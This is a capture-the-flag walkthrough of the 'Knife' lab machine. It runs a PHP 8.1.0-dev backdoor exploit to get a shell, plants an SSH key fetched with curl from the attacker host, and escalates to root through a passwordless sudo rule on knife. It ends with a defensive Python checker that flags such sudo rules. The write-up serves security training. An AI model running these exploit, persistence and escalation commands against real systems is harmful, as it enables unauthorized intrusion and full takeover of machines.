Enumeration
I ran nmap and found ports 22 and 80 open.
┌─[]─[user@parrot]─[~]
└──╼ ports=$(nmap -p- -T4 -Pn -n 10.129.132.165 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
┌─[user@parrot]─[~]
└──╼ echo $ports
22,80
┌─[user@parrot]─[~]
└──╼ nmap -sC -sV -Pn -p$ports 10.129.132.165
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-07 14:36 BST
Nmap scan report for 10.129.132.165
Host is up (0.049s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Emergent Medical Idea
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Because port 80 is open, I check whether a website is hosted on the machine. There is one, but it has nothing interesting, just an empty static page.
A directory scan with gobuster reveals one directory, “server-status”, but still nothing interesting.
I use nikto to scan the web server and find something interesting: the “X-Powered-By” header reports PHP/8.1.0-dev, and that PHP version was released with a backdoor…
┌─[user@parrot]─[~]
└──╼ nikto -h 10.129.132.165
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          10.129.132.165
+ Target Hostname:    10.129.132.165
+ Target Port:        80
+ Start Time:         2022-05-07 14:44:33 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: PHP/8.1.0-dev
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ 6544 items checked: 0 error(s) and 3 item(s) reported on remote host
+ End Time:           2022-05-07 14:49:59 (GMT1) (326 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
User flag
With a quick search I found two exploits on GitHub, exploit-1 and exploit-2. I downloaded the first one because it directly opens a reverse shell on the target and seems simpler to use, perfect for my objective.
I cloned the repository and ran the script. It worked perfectly; I took the flag and continued with the privilege escalation.
┌─[user@parrot]─[~/htb/knife/exploits/Exploit-PHP-8.1.0]
└──╼ ./php_8.1_rce.sh http://10.129.132.165
Checking if host is vulnerable...
Vulnerable --> PHP/8.1.0
[+] Spawning shell
$ whoami
james
$ ls -l /home/james
total 4
-r-------- 1 james james 33 May  7 11:56 user.txt
$
Root flag
First I upgraded the shell, just for convenience. To do this I generate an ssh key and add it to the “authorized_keys” file of the james user.
# create the ssh key and host a web server
┌─[user@parrot]─[~/htb/knife/files]
└──╼ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/user/.ssh/id_rsa): ./id_rsa
[...]
┌─[user@parrot]─[~/htb/knife/files]
└──╼ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...

# on the target download and add the key to the "authorized_keys" file
$ curl http://10.10.14.93:8080/id_rsa.pub > /home/james/.ssh/authorized_keys
$

# connect to the target using ssh
┌─[]─[user@parrot]─[~/htb/knife/files]
└──╼ ssh -i id_rsa james@10.129.132.165
james@knife:~$ whoami
james
james@knife:~$
I upload linpeas.sh to the machine for a quick enumeration and quickly find several vulnerabilities:
- The sudo version is vulnerable to privilege escalation.
- Vulnerable to CVE-2021-4034 (privilege escalation).
- We can run the command “/usr/bin/knife” with sudo.
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.31

╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
The first two are very easy to exploit (just download the exploit and run it), so I will explore the third one.
I searched on Google and found that the program knife actually exists.
I search for it on GTFOBins and find an easy way to escalate privileges, taking advantage of the fact that we can execute it with sudo.
james@knife:~$ sudo knife exec -E 'exec "/bin/sh"'
# whoami
root
# ls -l /root/root.txt
-r-------- 1 root root 33 May  7 11:56 /root/root.txt
#
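The misconfiguration behind this escalation is a passwordless root sudo rule on a binary that can spawn a shell. As an added defender-side check (not part of the writeup), the script below parses `sudo -l` output in the format linpeas showed above and flags such rules; the sample input is reconstructed from this page, and the set of shell-capable binaries holds only knife, the one this page documents, so extend it for your own environment.

```python
import re
from dataclasses import dataclass

# Constructed sample input: the `sudo -l` output shown for james on this box.
SAMPLE_SUDO_L = """\
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
"""

# Binaries known to hand out a shell when run under sudo. Only knife (from
# this page, via GTFOBins) is listed here; this is an assumption-driven
# allowlist that an auditor should extend for their estate.
SHELL_CAPABLE = {"knife"}


@dataclass(frozen=True)
class SudoRule:
    runas: str      # user (and optional group) the command runs as
    nopasswd: bool  # True when the NOPASSWD: tag is present
    command: str    # command spec, e.g. /usr/bin/knife or ALL


# "(root) NOPASSWD: /usr/bin/knife"  ->  runas, tag list, command list
RULE_RE = re.compile(r"^\s*\(([^)]+)\)\s*((?:[A-Z]+:\s*)*)(.+?)\s*$")


def parse_sudo_l(text: str) -> list[SudoRule]:
    """Return the command rules listed after the 'User X may run' line."""
    rules, in_cmds = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_cmds = True
            continue
        m = RULE_RE.match(line) if in_cmds else None
        if not m:
            continue
        runas, tags, cmds = m.groups()
        nopasswd = "NOPASSWD:" in tags
        for cmd in cmds.split(","):
            rules.append(SudoRule(runas.strip(), nopasswd, cmd.strip()))
    return rules


def risky_rules(rules: list[SudoRule], shell_capable=SHELL_CAPABLE) -> list[SudoRule]:
    """Flag passwordless rules running as root (or ALL) for ALL or a shell-capable binary."""
    flagged = []
    for r in rules:
        runas_root = r.runas.split(":")[0].strip() in ("root", "ALL")
        binary = r.command.split()[0].rsplit("/", 1)[-1]
        if runas_root and r.nopasswd and (r.command == "ALL" or binary in shell_capable):
            flagged.append(r)
    return flagged
```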
And that’s it! I’m root.